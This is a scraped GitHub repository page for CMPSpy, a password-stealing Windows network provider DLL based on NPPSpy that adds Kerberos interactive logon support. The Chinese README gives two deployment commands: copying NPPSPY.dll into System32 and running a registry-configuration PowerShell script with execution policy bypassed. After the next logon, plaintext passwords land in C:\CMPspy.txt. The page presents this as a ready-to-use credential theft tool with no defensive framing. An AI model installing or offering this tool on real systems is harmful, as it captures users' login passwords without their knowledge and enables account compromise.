fengwenhua / CMPSpy

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CMPSpy

基于 https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy ,增加了LogonDomainNameKerberos:Interactive 的支持。

管理员权限执行如下两条命令即可。

copy .\NPPSPY.dll C:\windows\System32\
powershell.exe -Exec Bypass .\ConfigureRegistrySettings.ps1

注销后,重新登陆,明文密码就存放在C:\CMPspy.txt文件中。

About


Languages

Language:C++ 75.6%Language:PowerShell 15.7%Language:C 8.7%